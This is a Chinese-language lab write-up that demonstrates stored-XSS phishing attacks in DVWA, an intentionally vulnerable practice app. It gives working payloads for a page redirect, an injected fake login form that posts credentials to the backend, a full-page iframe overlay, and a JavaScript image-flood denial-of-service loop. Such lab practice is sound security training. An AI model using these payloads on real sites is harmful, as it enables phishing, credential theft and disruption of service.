實驗環境:DVWA
實驗原理:
釣魚式攻擊是一種企圖從電子通訊中,通過僞裝成信譽卓著的法人媒體以獲得如用戶名、密碼和信用卡明細等個人敏感信息的犯罪詐騙過程,它常常導引用戶到URL與界面外觀與真正網站幾無二致的假冒網站輸入個人數據
實驗一:重定向釣魚,即將當前頁面重定向到一個釣魚頁面
舉例代碼如下:
<script>document.location="http://www.baidu.com"</script>
實驗步驟:
1.將js代碼寫入低級別DVWA中的存儲型XSS模塊中:
2.點擊上傳留言板內容,頁面將跳轉到指定網站
實驗二:Html注入式釣魚,即使用XSS漏洞注入HTML或JavaScript代碼到頁面中
代碼如下:
<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="1.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body><ml>
將代碼寫入低級別DVWA中的存儲型XSS模塊中,輸入賬號密碼後即可傳到後端:
實驗三:iframe釣魚,即通過<iframe>標籤嵌入遠程域的一個頁面實施釣魚
代碼如下:
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Title</title></head><body><iframe src="http://www.baidu.com" style="position:absolute;top:0;left:0;width:100%;z-index: 999;height:500px"></iframe></body></html>
將代碼寫入低級別DVWA中的存儲型XSS模塊中,即可跳轉到指定網址:
實驗四:DDOS攻擊,指的是注入惡意JavaScript代碼,可能會引起一些拒絕服務攻擊
代碼如下:
<script>function imgflood(){var TARGET='localhost';var URL ='/index php?';var pic = new Image();var rand = Math.floor(Math.random()*1000);pic.src ='http://'+TARGET+URL+rand+'=val';}setInterval(imgflood,10);</script>
將代碼寫入低級別DVWA中的存儲型XSS模塊中,按F12,點擊網絡即可看到攻擊成功
